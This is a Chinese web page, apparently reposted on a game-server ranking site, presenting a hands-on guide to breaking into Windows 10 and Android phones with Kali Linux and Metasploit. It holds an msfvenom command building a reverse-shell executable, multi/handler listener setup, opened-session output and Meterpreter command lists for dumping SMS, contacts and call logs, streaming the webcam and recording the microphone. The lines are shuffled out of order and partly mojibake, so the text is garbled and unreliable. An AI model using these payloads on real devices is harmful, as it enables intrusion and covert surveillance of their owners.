当前位置:主页 > 页游私服排行 > 正文

kali2.0下入侵windows 10和android手机实战

时间:2020-08-13 21:53 | 来源:gdsc.net.cn | 编辑:网页游戏私服排行榜

小编导读:msfvenom platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b \x00 -f exe-only -o /root/Desktop/shell1.exe root@kali:~# service postgresql start roo

ls List files

Command Description

sleep Force Meterpreter to go quiet, then re-establish session.

=======================

——- ———–

kali-rolling

? Help menu

[*] Started reverse TCP handler on 192.168.168.111:3333

search Search for files

write Writes data to a channel

background Backgrounds the current session

ifconfig Display interfaces

send_sms Sends SMS from target session

[*] Starting…

Command Description

[*] Starting the payload handler…

QQ截图20160617111539

QQ截图20160617112839

bgkill Kills a background meterpreter script

Command Description

rm Delete the specified file

Stdapi: System Commands

Microsoft Windows [�汾 10.0.10586]

getwd Print working directory

bglist Lists running background scripts

download Download a file or directory

QQ截图20160617104228

kali2.0入侵android手机实战

bgrun Executes a meterpreter script as a background thread

rmdir Remove directory

set_timeouts Set the current session timeout values

machine_id Get the MSF ID of the machine attached to the session

============================

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

interval_collect Manage interval collection capabilities

[*] Device is not rooted

cat Read the contents of a file to the screen

LHOST yes The listen address

QQ截图20160617112812

run Executes a meterpreter script or Post module

ps List running processes

Payload options (windows/x64/shell/reverse_tcp):

=============

read Reads data from a channel

dump_contacts Get contacts list

check_root Check if device is rooted

set PAYLOAD android/meterpreter/reverse_tcp

QQ截图20160617104205

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

===========================

webcam_snap Take a snapshot from the specified webcam

Command Description

[*] Preparing player…

[*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2016-06-16 20:59:00 -0400

Stdapi: File system Commands

load Load one or more meterpreter extensions

QQ截图20160617112853

root@kali:~# msfconsole

disable_unicode_encoding Disables encoding of unicode strings

channel Displays information or control active channels

QQ截图20160617104244

use exploit/multi/handler

[*] Started reverse TCP handler on 172.19.40.110:4444

info Displays information about a Post module

meterpreter > webcam_stream

execute Execute a command

set payload windows/x64/shell/reverse_tcp

——- ———–

dump_sms Get sms messages

[*] Streaming…

sysinfo Gets information about the remote system, such as OS

enable_unicode_encoding Enables encoding of unicode strings

msf exploit(handler) > set LPORT 8888

getlwd Print local working directory

=======================

cd Change directory

[*] Exploit completed, but no session was created.

uuid Get the UUID for the current session

Core Commands

pwd Print working directory

getuid Get the user that the server is running as

meterpreter > check_root

dir List files (alias for ls)

help Help menu

route View and modify the routing table

use exploit/multi/handler

QQ截图20160617111438

meterpreter > help

show options

[*] Started reverse TCP handler on 172.19.40.110:8888

edit Edit a file

C:\Users\�ѿ�\Desktop\projects>

mkdir Make directory

lcd Change local working directory

—- ————— ——– ———–

—- ————— ——– ———–

[*] Starting the payload handler…

webcam_stream Play a video stream from the specified webcam

[*] Opening player at: kxQmnwHE.html

Stdapi: Networking Commands

(c) 2015 Microsoft Corporation����������Ȩ����

——- ———–

Command Description

Name Current Setting Required Description

exit Terminate the meterpreter session

^C[-] Exploit failed: Interrupt

meterpreter > sessions -I

LPORT 4444 yes The listen port

webcam_list List webcams

——- ———–

resource Run the commands stored in a file

——- ———–

exploit

geolocate Get current lat-long using geolocation

Name Current Setting Required Description

exploit

upload Upload a file or directory

set LHOST 172.19.40.110

lpwd Print local working directory

Stdapi: Webcam Commands

[*] Starting the payload handler…

[*] Sending stage (336 bytes) to 192.168.168.109

[*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2016-06-16 23:11:36 -0400

webcam_chat Start a video chat

quit Terminate the meterpreter session

Module options (exploit/multi/handler):

LPORT => 8888

——- ———–

ipconfig Display interfaces

================

root@kali:~# service postgresql start

set LHOST 192.168.168.111

irb Drop into irb scripting mode

wlan_geolocate Get current lat-long using WLAN information

Command Description

get_timeouts Get the current session timeout values

msf exploit(handler) > exploit

dump_calllog Get call log

close Closes a channel

set LPORT 3333

[*] Sending stage (60790 bytes) to 172.19.0.172

show options

record_mic Record audio from the default microphone for X seconds

shell Drop into a system command shell

transport Change the current transport mechanism

portfwd Forward a local port to a remote service

use Deprecated alias for ‘load’

Android Commands

Tag关键词: 手机  Android